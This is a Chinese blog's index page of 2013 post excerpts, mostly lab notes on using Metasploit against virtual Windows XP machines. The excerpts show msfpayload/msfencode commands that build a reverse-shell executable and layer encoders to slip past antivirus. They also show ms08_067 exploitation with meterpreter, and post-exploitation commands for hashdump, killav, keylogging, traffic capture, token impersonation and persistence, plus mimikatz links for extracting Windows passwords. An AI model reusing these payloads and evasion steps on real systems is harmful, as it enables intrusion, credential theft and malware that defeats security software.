- 博客(44)
- 收藏
- 关注
原创 metasploit启动远程shell而不被杀毒软件发现
root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikat
2013-04-29 22:36:37 2461
原创 metasploit自定义可执行文件模板
在网上下载Sysinternals,解压,得到procexp.exe,把它传到BT5上去,然后生成pe_backdoor.exeroot@bt:/opt/metasploit/msf3# mkdir workroot@bt:/opt/metasploit/msf3# cp ~/procexp.exe work/root@bt:/opt/metasploit/msf3# ls work/p
2013-04-29 22:27:18 2336
原创 metasploit多重编码
root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_
2013-04-29 21:07:36 2580
原创 metasploit使用msf编码器
root@bt:~# msfencode -lFramework Encoders================== Name Rank Description ---- ---- ----------- cmd/generic_sh
2013-04-29 20:25:20 3498
原创 metasploit与avg杀毒软件
在网上下载了avg杀毒软件,在虚拟机XP上安装了一下,然后,把metasploit生成的payload1.exe上传到XP的C盘。root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 X > payload1.exeCreated by msfpayload (http://www.m
2013-04-29 20:09:37 1018
转载 metasploit的常用命令
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_BasicsMeterpreter BasicsSince the Meterpreter provides a whole new environment, we will cover some of the basic M
2013-04-28 22:01:22 3049
原创 metasploit的文件系统的命令
1、lsmeterpreter > lsListing: C:\============Mode Size Type Last modified Name---- ---- ---- ------------- ----40777/rwxrwxr
2013-04-28 21:42:57 777
原创 metasploit的msfpayload创建可独立运行的二进制文件
root@bt:~# msfpayload windows/shell_reverse_tcp O Name: Windows Command Shell, Reverse TCP Inline Module: payload/windows/shell_reverse_tcp Version: 14774 Platform: Windows
2013-04-28 21:26:04 3779
原创 metasploit通过附加的Railgun组件操作Windows API
msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ms08_067_netapi) > set
2013-04-28 15:22:41 2143 1
原创 metasploit将命令行shell升级为meterpreter
msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ms08_067_netapi) > set
2013-04-28 14:45:09 8059 3
原创 metasploit控制持久化
msf exploit(ms08_067_netapi) > exploit[*] Started reverse handler on 192.168.1.11:4444 [*] Attempting to trigger the vulnerability...[*] Sending stage (752128 bytes) to 192.168.1.142[*] Meterpre
2013-04-27 23:52:25 4672 1
原创 redhat9修改IP等网络配置
[root@localhost root]# cat /etc/sysconfig/network-scripts/ifcfg-eth0DEVICE=eth0BOOTPROTO=staticONBOOT=yesIPADDR=192.168.1.21NETMASK=255.255.255.0NETWORK=192.168.1.0GATEWAY=192.168.1.1[root@lo
2013-04-27 21:30:55 1918
原创 metasploit查看目标机上的所有流量
meterpreter > run packetrecorder -i 1[*] Starting Packet capture on interface 1[+] Packet capture started[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/ROOT-9743DD32E3_201304
2013-04-27 18:09:12 1715
原创 metasploit获取系统信息
meterpreter > run scraper[*] New session on 192.168.1.142:445...[*] Gathering basic system information...[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: O
2013-04-27 18:05:30 1816
原创 metasploit获取系统密码hash值
meterpreter > run hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY e503dc5ce6734d7f11ccecf5623b0f1c...[*] Obtaining the user list and keys...[*] Decrypting user keys
2013-04-27 18:03:38 6051
原创 metasploit关闭杀毒软件
meterpreter > run killav[*] Killing Antivirus services on the target...meterpreter >特意在XP上装了360,但是没有成功关闭杀毒软件。不知道为什么。
2013-04-27 18:02:04 3821
原创 metasploit迁移进程
msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set RHOST 192.168.1.142RHOST => 192.168.1.142msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
2013-04-27 17:18:55 3338
原创 metasploit运行run vnc
msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set RHOST 192.168.1.142RHOST => 192.168.1.142msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
2013-04-27 16:43:59 15846
原创 metasploit的session操作
msf > sessions -lActive sessions=============== Id Type Information Connection -- ---- ----------- -
2013-04-25 22:29:45 18008
原创 metasploit入侵后的网络操作
meterpreter > run get_local_subnetsLocal subnet: 192.168.1.0/255.255.255.0meterpreter >上面是获得受控系统的本地子网掩码的命令。meterpreter > ifconfigInterface 1============Name : MS TCP Loopback
2013-04-25 22:28:41 2964 1
原创 metasploit的令牌假冒攻击
root@bt:~# msfconsole NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for t
2013-04-25 22:04:49 3304
原创 PsExec的问题及其解决办法
C:\>PsExec.exe \\192.168.1.142 cmdPsExec v1.98 - Execute processes remotelyCopyright (C) 2001-2010 Mark RussinovichSysinternals - www.sysinternals.comCouldn't access 192.168.1.142:登录失败: 未知的用户名或
2013-04-24 23:12:56 23446 4
原创 net use实验
C:\>net use \\192.168.1.141\ipc$ "" /user:""命令成功完成。C:\>net use \\192.168.1.141\ipc$ /del\\192.168.1.141\ipc$ 已经删除。加上用户名和密码,发生如下错误:C:\>net use \\192.168.1.141\ipc$ "yang" /user:"yang
2013-04-24 21:46:19 3909 1
转载 jQuery中each的break和continue
http://rmn190.iteye.com/blog/791605 北京分公司 天津分公司 河北分公司 山西分公司 $("option").each(function(){ if($(this).val() == 11){ return false; // false时相当于break, 如果return true
2013-04-23 21:48:24 2988
转载 PsExec下载地址及其用法
PsExec下载地址 PSTools.ziphttp://technet.microsoft.com/en-us/sysinternals/bb897553.aspxUsing PsExecSee the July 2004 issue of Windows IT Pro Magazine for Mark's article that covers
2013-04-23 21:07:03 6166
原创 用mimikatz来获取win7的密码
mimikatz下载地址:http://www.webshell.cc/wp-content/uploads/2012/02/mimikatz_trunk.ziphttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zipblog.gentilkiwi.com应该是法国佬的博客。用mimikatz来获
2013-04-23 20:33:22 8151
原创 java、axis2、wsdl
在axis2下载zip包和war包,我下载的是http://mirrors.cnnic.cn/apache//axis/axis2/java/core/1.6.2/axis2-1.6.2-bin.zip和http://mirrors.cnnic.cn/apache//axis/axis2/java/core/1.6.2/axis2-1.6.2-war.zip下载完后,解压axis2-1
2013-04-22 21:51:04 7766
原创 给BT5设置ssh服务
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_keyservice ssh stopservice ssh start生产密钥key时,需要设置密码。我是直接按回车的。启动ssh服务后,在XP上用secure crt去连。
2013-04-21 22:00:44 3469
原创 hashdump获得XP的用户密码的hash值
入侵XP成功后,命令:use privrun post/windows/gather/hashdump这样就可以获得用户的密码的hash值了。
2013-04-21 21:47:41 5871
原创 meterpreter获取系统信息和键盘记录
刚下载了BT5,今天就用BT5来测试。输入ps,图片上面没有显示,不知道为什么。我在XP上打开了记事本程序,下面再ps一下,就显示notepad.exe了。在下面的图中,看到notepad的pid是1024,输入命令migrate 1024就将回话迁移到notepad上面去了。然
2013-04-20 23:30:04 6103
原创 入侵mssql2000
环境:XP + SP3 + MS SQL SERVER 2000 + SP4数据库配置如下:配置成SQL Server验证,sa密码是root123。BT4里用metasploit入侵过程如下:上面第一次登陆失败,是因为mssql2000的登陆模式
2013-04-19 22:18:56 1479
原创 入侵samba服务器失败
用bt4来入侵ubuntu9.0.4的samba服务器失败。失败总是有原因。还不知道为什么失败。上面的DCERPC FAULT => nca_op_rng_error是什么意思?
2013-04-14 22:47:43 1192
原创 ms08_067被成功exploit
昨天用的环境是FC9,exploit失败。我怀疑是xp版本的问题,于是下了xp + sp2的英文版本,然后再用FC9里的metasploit来exploit,还是失败。看到作者用的是backtrack,于是,下载了一个bt4。bt4里面自带了metasploit。这次,exploit成功了。过程如下:
2013-04-12 22:09:58 5931 1
原创 用metasploit来exploit虚拟机XPSP3的ms08_067
看到MS08-067: VULNERABLE,说明有漏洞exploit失败,不知道原因。书里写着这样几句话:“这暗示我们或许能够对这台主机进行攻击。攻击是否成功取决于目标主机的操作系统版本、安装的服务包版本以及语言类型,同时还依赖于是否成功地绕过了数据执行保护DEP。”我想可能没有成功绕过DEP吧。
2013-04-11 22:06:52 4051
转载 十条常用nmap命令行格式
1) 获取远程主机的系统类型及开放端口nmap -sS -P0 -sV -O 这里的 可以是单一 IP, 或主机名,或域名,或子网-sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你关闭 ICMP pings.-sV 打开系统版本检测-O 尝试识别远程操作系统其它选项:-A 同时打开操作系统指纹和版本检测-v 详细输出扫描情况.nmap
2013-04-10 22:34:10 1039
原创 安装Nessus
[root@localhost ~]# rpm -ivh Nessus-5.0.3-es6.i386.rpm error: Failed dependencies: libc.so.6(GLIBC_2.11) is needed by Nessus-5.0.3-es6.i386[root@localhost ~]# rm -f Nessus-5.0.3-es6.i386.rpm [root
2013-04-09 22:57:45 1305
原创 安装NeXpose失败
环境是虚拟机fedora9,内存512MB,安装过程如下:[root@localhost ~]# ./NeXposeSetup-Linux32.bin Unpacking JRE ...Starting Installer ...[root@localhost ~]# ./NeXposeSetup-Linux32.bin -cUnpacking JRE ...Starting I
2013-04-09 22:25:12 3656
原创 用netcat和telnet来获取IIS的旗标
今天,下了两个IIS,一个是5.1的,一个是6.0的。一直以为只是版本的差别,别的没什么不同。结果,在XP上安装6.0,装不上。上网查了一下,才知道5.1用于XP,6.0用于2003。安装好后,打开http://127.0.0.1/,竟然要输入密码,上网查了一下,才知道默认的两个网页,好像是加密过的。于是,自己用dreamweaver8生成了一个index.htm,放到C:\Inetpub\www
2013-04-09 21:50:00 2138
原创 metasploit编写自己的扫描器
require 'msf/core'class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'My custom TCP scan', 'Versio
2013-04-08 22:50:50 3789 1
转载 8个实用的Linux netcat命令示例
Netcat 或者叫 nc 是 Linux 下的一个用于调试和检查网络工具包。可用于创建 TCP/IP 连接,最大的用途就是用来处理 TCP/UDP 套接字。这里我们将通过一些实例来学习 netcat 命令。1. 在服务器-客户端架构上使用 Netcatnetcat 工具可运行于服务器模式,侦听指定端口1$ nc -l 2389
2013-04-08 22:12:35 724
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人